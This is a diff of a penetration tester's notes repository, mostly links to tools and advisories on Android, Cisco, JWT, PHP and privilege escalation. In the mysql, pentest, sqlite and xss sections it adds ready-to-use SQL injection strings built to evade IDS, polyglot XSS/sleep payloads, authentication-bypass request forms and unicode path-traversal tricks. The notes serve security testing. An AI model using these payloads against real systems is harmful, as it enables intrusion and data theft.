Moo

android

@@ -1,5 +1,9 @@
 # android
 
+# quick analysis
+https://github.com/1N3/ReverseAPK
+
+# good reference
 https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet/
 https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
 

applocker

@@ -8,6 +8,7 @@ https://www.attackdebris.com/?p=143
 rundll32 meterpreter.dll, blah
 
 # bypassing application whitelisting
+https://github.com/GreatSCT/GreatSCT
 https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt
 https://khr0x40sh.wordpress.com/2015/05/27/whitelist-evasion-revisited/
 

cisco

@@ -11,6 +11,9 @@ https://www.ixiacom.com/company/blog/equation-groups-firewall-exploit-chain
 # heap overflow CVE-2016-1287
 https://blog.exodusintel.com/
 
+# Cisco Small Business 220 Series Smart Plus (Sx220) Switches
+snmp auth bypass due to hardcoded community string http://www.synacktiv.com/ressources/advisories_cisco_switch_sg220_default_snmp.pdf
+
 # get version of Cisco ASA OS
 /admin/exec/show+version
 

forensic

@@ -12,6 +12,10 @@ http://blog.kiddaland.net/downloads/
 # linux mem dump with rekall
 https://isc.sans.edu/diary/Linux+Memory+Dump+with+Rekall/17775
 
+# recover passwords from swap (unix accounts' etc.)
+https://github.com/sevagas/swap_digger
+https://github.com/huntergregal/mimipenguin
+
 # differences between two virtual machine disk images
 http://libguestfs.org/virt-diff.1.html (via http://rwmj.wordpress.com/2013/12/19/new-in-virt-tools-virt-diff)
 

ios

@@ -87,6 +87,9 @@ UIApp.delegate
 # reverse eng toolkit
 iRET
 
+# security testing framework
+https://github.com/mwrlabs/needle
+
 # memory
 https://hexplo.it/introducing-memscan/
 

ipmi

@@ -3,6 +3,9 @@
 https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
 http://fish2.com/security/
 
+# hp Lights-Out (iLO)
+https://www.synacktiv.com//posts/exploit/rce-vulnerability-in-hp-ilo.html
+
 # gul
 * Exploiting IPMI
 https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi

javascript

@@ -1,5 +1,8 @@
 # javascript
 
+# extract urls
+https://github.com/nahamsec/JSParser
+
 # deobfucate
 http://jsnice.org/
 http://jsbeautifier.org/

jwt

@@ -8,3 +8,7 @@ https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-lib
 # JSON Web Encryption (JWE) with Key Agreement with Elliptic Curve Diffie-Hellman Ephemeral Static (ECDH-ES)
 attacker can recover private key
 vuln: go-jose, node-jose, jose2go, Nimbus JOSE+JWT, jose4
+
+# automate tests
+https://github.com/ticarpi/jwt_tool
+https://github.com/andresriancho/jwt-fuzzer

malware

@@ -27,6 +27,8 @@ wepawet.iseclab.org
 http://www.darknet.org.uk/2016/05/captipper-explore-malicious-http-traffic/ (observe HTTP traffic from pcap)
 
 # analysis
+http://haxf4rall.com/2017/07/26/flare-vm-a-fully-customizable-windows-based-security-distribution-for-malware-analysis-incident-response-penetration-testing/ # flare vm
+https://github.com/GoSecure/malboxes
 http://www.malware-analyzer.com/malware-analysis-tools/
 http://cuckoosandbox.org/
 

mysql

@@ -22,6 +22,8 @@ and 1=1 procedure analyse() # afficher les noms des colonnes du select
 evade IDS with information_schema.{key_column_usage,table_constraints,statistics,partitions}
 select -> select%23randomText%0A and user() -> user%23randomText%0A() # see sqlmap tamper scripts
 select X'31333337' == select 0x31333337
+comments: /*!50000union*/ /*!50000all*/ /*!50000select*/ group_concat(table_name) /*!50000from*/ information_schema.tables
+no space: (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
 
 # group_concat to get everything in one line and one column
 select group_concat(schema_name separator 0x2c) from information_schema.schemata;

pentest

@@ -40,7 +40,7 @@ blah?x[y]=1&x[y]z=2
 blah.php?foo=bar =? blah.php?foo[]=bar (if equals maybe app casts the values of the array into a string)
 
 * source code leak
-windows -> ::$data, case insensitive .JSP
+http://a.com/index.jsp::$DATA or .JSP or .jsp. or jsp%20
 http://a.com/myapp/%252e%252e/manager/html mod_jk
 http://a.com/index.jsp%01 (http://secalert.net/#scl-soh)
 http://a.com/index.js%70 (WebLogic http://www.securityfocus.com/bid/2527/exploit)
@@ -51,6 +51,10 @@ http://a.com/%3f.jsp (Allaire JRun Root http://www.securityfocus.com/bid/3592/di
 http://a.com///[1-4096 slashes here]/admin/* (Apache long slash path directory listing http://www.securityfocus.com/bid/2503/discuss)
 http://a.com/%5cadmin/ (BEA WebLogic Directory Traversal with %00, %2e, %2f and %5c via:http://www.securityfocus.com/bid/2513/discuss)
 
+* cgi
+shellshock
+/cgi-bin/test-cgi?/* and /cgi-bin/test-cgi?* https://teamrocketist.github.io/2017/09/15/Web-SECTF-Sprinkler-system/ http://insecure.org/sploits/test-cgi.server_protocol.html
+
 * polyglot (http://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra)
 mysql: +or+SLEEP(10)/*'or+SLEEP(10)+or'"or+SLEEP(10)+or"*/ urlencoded: %20or%20sleep%2810%29/%2a%27or%20sleep%2810%29%20or%27%22or%20sleep%2810%29%20or%22%2a/
 xss: " onclick=alert(1)//<button value=Click_Me ' onclick=alert(1)//> */ alert(1); /* 
@@ -98,23 +102,29 @@ code: if (@mysql_num_rows($sql) == 1)
 GET, POST, Cookie, User-Agent, Host, Referer, X-Forwarded-For, X-Forwarded-Host, Origin, Accept-Language ...
 
 X-Forwarded-For: 127.0.0.1
-X-Forwarded-For: 175.45.177.64 the hostname's IP (ctf)
+X-Forwarded-For: 175.45.177.64 (the hostname's IP or the interface IP etc.)
+
+Proxy: 127.0.0.1:1 (https://httpoxy.org)
 
 * bypass IP whitelisting
 X-Forwarded-For: 0000::1 (RoR 4.2 Web Console https://gist.github.com/joernchen/d868521352f1ccd25095)
 
 * authentication
 incomplete validation: remove last character of long password, change case, remove specials
-pw hash collision / php type juggling (https://github.com/spaze/hashes)
-register AdMiN to login as admin # MySQL performs a case insensitive comparison by default
+password hash collision / php operator ==
+register Admin to login as admin # MySQL performs a case insensitive comparison by default
 register admin%20 to login as admin # MySQL ignores trailing spaces when performing string comparison
 register admin++++...++++x column truncation (http://www.notsosecure.com/blog/2008/09/11/sql-column-truncation-vulnerabilities/ http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/ http://www.sektioneins.com/en/advisories/advisory-052008-wordpress-user_login-column-sql-truncation-vulnerability.html)
 /activate/?activation_code= => SELECT * FROM users WHERE (users.`activation_code` IS NULL) LIMIT 1 # login w/o password as the first account
-login.php?login=admin&password[]=a // strcmp($expectedpw, $_GET['password') == 0
+/login?username[]=admin&password=
+/login?username=admin&password[]=a // strcmp($expectedpw, $_GET['password') == 0
+
+* race conditions
+register account with multiple emails, use a coupon multiple times etc.
 
 * authentication bypass
 cookie: $username|$expiry|$hmac => hmac_md5(admin1|1353464343, $key) == hmac(admin|11353464343, $key) (wordpress) or bf $key (rack)
-type juggling in php or other (http://www.php.net/manual/en/language.types.type-juggling.php) var_dump('1abcdef' == 1); => true. Or stuff like strcmp, ==, equals etc.
+type juggling in php or other (http://www.php.net/manual/en/language.types.type-juggling.php) var_dump('1abcdef' == 1); => true. Or stuff like strcmp, ==, equals ... (http://turbochaos.blogspot.com.au/2013/08/exploiting-exotic-bugs-php-type-juggling.html)
 var_dump("0e1234" == "0e4321"); => true (0 multiplied by anything is still 0) useful if server does: if (hmac(..) == hmac(..))
 try with empty password (ldap unauthenticated authentication)
 
@@ -127,6 +137,7 @@ https://www.owasp.org/index.php/Mass_Assignment_Cheat_Sheet
 
 * reset forgot pw
 mysql 1="1abc" => true and 0="abc" => true so request /reset?token=0 (http://phrack.org/issues/69/12.html)
+opencfp reset token is NULL in db by default so request ?reset_token=%00 (opencfp bug http://haxx.ml/post/149975211631/how-i-hacked-your-cfp-and-probably-some-other)
 send more than one reset password request at the same time, or http pipeline multiple requests (dont update content-length or send Connection: close)
 php integer key truncation (send id of 4294967296)
 
@@ -184,7 +195,7 @@ upload imagetragick (im relies on the magic header so even if app checks extensi
 * passive scanning
 parse image responses for sql errors, path/ip disclosures etc.
 
-* path traversal
+* path traversal / LFI
 try ../ then ../../ then ../../../ (can get an error on first 2 but success on 3rd)
 ....// (evasion, more below)
 
@@ -265,6 +276,10 @@ more in Server Side Browsing by @agarri
 def utf7(s): # Illegal but accepted UTF7, useful for some blacklists
   return ''.join('+%s-' % b64encode('\x00' + c).rstrip('=') for c in s)
 
+* utf-16
+U-FF2e http://graphemica.com/%ef%bc%ae get(u'u\uff2e./flag.txt') (in case "ＮＮ" is blacklisted)
+U-012f http://graphemica.com/%c4%ae http://www.fileformat.info/info/unicode/char/012e/index.htm get(u'\u012e\u012e/flag.txt') (in case "Ｎ" is blacklisted)
+
 * path traversal
            URL-encoding | 16-bit unicode-encoding | double URL-encoding | overlong UTF-8 unicode-encoding
 dot            %2e      | %u002e                  | %252e               | %c0%2e  %e0%40%ae  %c0ae  etc.

php

@@ -13,6 +13,8 @@ https://docs.google.com/spreadsheets/d/1oWsmTvEZcfgc_1QkBczNGA3Gcffg_pmgKcak7iZl
 
 # magic hashes
 https://www.whitehatsec.com/blog/magic-hashes/
+https://md5db.net/explore/0E56
+https://github.com/spaze/hashes
 
 # integer key truncation
 https://www.sektioneins.de/blog/15-08-03-php_challenge_2015_solution.html

png

@@ -5,3 +5,6 @@ pngcheck -vt ctf.png
 
 # apt-get install pngtools
 pngchunks ctf.png
+
+# use pngsplit to extract every chunks
+

privesc

@@ -167,6 +167,7 @@ Pwn .bat admin scripts that expand %CD% in a directory under our control http://
 
 * summary
 http://www.r00tsec.com/2014/10/howto-summary-privilege-escalation.html
+https://www.sock-raw.org/wiki/doku.php/windows_priv_esc
 
 * extract passwords
 http://www.nirsoft.net/utils/bullets_password_view.html

screenshot

@@ -1,7 +1,9 @@
 # screenshot webkit
 
+https://github.com/graphcool/chromeless
 http://w00tsec.blogspot.com.au/2014/08/scan-internet-screenshot-all-things.html
 
+https://github.com/dxa4481/Snapper
 http://cutycapt.sourceforge.net/
 https://github.com/paulhammond/webkit2png/
 https://github.com/eelsivart/vnc-screenshot

solaris

@@ -8,3 +8,6 @@ telnet -l"-froot"
 
 # sfw
 /opt/sfw/bin/wget,nc,ncat,netcat
+
+# public exploits
+https://github.com/0xdea/exploits/tree/master/solaris

sqlite

@@ -20,3 +20,6 @@ https://www.sqlite.org/lang_corefunc.html#load_extension (can have extension on
 
 # check integrity
 sqlite3 blah.sqlite "PRAGMA integrity_check"
+
+# sqli
+union select sql from sqlite_master where type = 'table' -- -

ssrf

@@ -2,3 +2,4 @@
 
 https://cwe.mitre.org/data/definitions/918.html
 https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit
+https://gist.github.com/mhmdiaa/2587e2330b87db99c81ace2a190e235f

symantec

@@ -3,7 +3,6 @@
 nmap -p38292,12174,2967,8443,9090
 
 # Symantec System Center Alert Management System 
-
 38292/tcp ./modules/exploits/windows/antivirus/ams_hndlrsvc.rb ./modules/exploits/windows/antivirus/symantec_iao.rb
 12174/tcp ./modules/exploits/windows/antivirus/ams_xfr.rb
 2967/tcp ./modules/exploits/windows/antivirus/symantec_rtvscan.rb (buffer overflow)
@@ -15,3 +14,6 @@ https://github.com/brandonprry/metasploit-framework/blob/sepm_bypass_rce/modules
 
 # signatures
 http://www.symantec.com/security_response/attacksignatures/
+
+# Symantec Messaging Gateway Version 10.6.3-2
+http://seclists.org/fulldisclosure/2017/Aug/28

vuln_by_design

@@ -15,6 +15,7 @@ http://aspnet.testsparker.com
 
 demo.testfire.net
 zero.webappsecurity.com (msaccess!)
+https://github.com/cr0hn/vulnerable-node (NodeJS website)
 
 http://code.google.com/p/wavsep/ (to eval scanners)
 damn vulnerable web app

xss

@@ -181,6 +181,7 @@ http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/
 # CSP tricks
 https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22
 http://blog.portswigger.net/2016/12/bypassing-csp-using-polyglot-jpegs.html
+https://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
 
 # length restriction bypasses
 convert to domxss: <script>eval(location.hash.substr(1))</script>